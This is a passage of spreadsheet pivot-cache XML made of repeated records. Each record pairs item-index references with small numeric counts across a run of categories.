  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="697"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="698"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="698"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="698"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="698"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="698"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="698"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="698"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="698"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="698"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="698"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="698"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="698"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="698"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="698"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="699"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="699"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="699"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="699"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="699"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="699"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="32"/>
    <x v="699"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="699"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="699"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="699"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="32"/>
    <x v="699"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="699"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="699"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="699"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="700"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="700"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="700"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="700"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="700"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="700"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="700"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="700"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="15"/>
    <x v="700"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="700"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="700"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="700"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="700"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="700"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="701"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="701"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="701"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="701"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="367"/>
    <x v="18"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="18"/>
    <x v="18"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="702"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="702"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="702"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="702"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="702"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="702"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="702"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="702"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="702"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="702"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="702"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="702"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="702"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="702"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="703"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="703"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="703"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="703"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="703"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="703"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="703"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="703"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="703"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="703"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="703"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="703"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="703"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="703"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="704"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="704"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="704"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="704"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="704"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="704"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="704"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="704"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="704"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="704"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="704"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="704"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="704"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="704"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="705"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="705"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="705"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="705"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="705"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="705"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="705"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="705"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="705"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="705"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="705"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="705"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="365"/>
    <x v="705"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="705"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="706"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="706"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="706"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="706"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="706"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="706"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="706"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="707"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="707"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="707"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="707"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="707"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="707"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="707"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="707"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="707"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="707"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="707"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="707"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="707"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="707"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="708"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="708"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="708"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="708"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="708"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="708"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="709"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="709"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="709"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="3"/>
    <x v="709"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="709"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="709"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="709"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="709"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="709"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="709"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="709"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="709"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="709"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="709"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="710"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="710"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="710"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="710"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="710"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="710"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="710"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="710"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="710"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="710"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="710"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="22"/>
    <x v="710"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="710"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="710"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="711"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="711"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="711"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="14"/>
    <x v="711"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="711"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="711"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="712"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="712"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="712"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="712"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="712"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="712"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="712"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="712"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="713"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="713"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="713"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="713"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="713"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="713"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="713"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="28"/>
    <x v="713"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="713"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="713"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="713"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="165"/>
    <x v="713"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="312"/>
    <x v="713"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="713"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="714"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="714"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="714"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="714"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="714"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="714"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="715"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="715"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="715"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="715"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="715"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="716"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="716"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="716"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="717"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="717"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="717"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="717"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="717"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="718"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="718"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="718"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="718"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="11"/>
    <x v="718"/>
